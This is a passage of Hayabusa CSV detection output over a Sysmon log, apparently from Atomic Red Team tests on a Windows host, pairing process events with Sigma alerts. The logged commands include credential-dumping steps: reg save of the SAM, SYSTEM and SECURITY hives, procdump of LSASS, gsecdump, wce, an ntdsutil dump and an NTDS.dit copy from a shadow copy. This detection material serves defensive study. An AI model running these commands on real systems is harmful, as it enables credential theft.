MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 
747F3D96-DA72-5D31-0000-0010044F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 
747F3D96-DA73-5D31-0000-00106A8D3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network 
Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: 
C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 
747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 
747F3D96-DD94-5D31-0000-0010F4864A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 
747F3D96-DD95-5D31-0000-001075964A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 584 | PGUID: 747F3D96-DD9E-5D31-0000-001059374B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,high,Evas,Obfuscated Command Line Using Special Unicode Characters,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_char_in_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4208 | PGUID: 747F3D96-DD9E-5D31-0000-00106D3A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DD9E-5D31-0000-00100C3F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 747F3D96-DD9E-5D31-0000-00105E414B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,../hayabusa-rules/sigma/process_creation/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
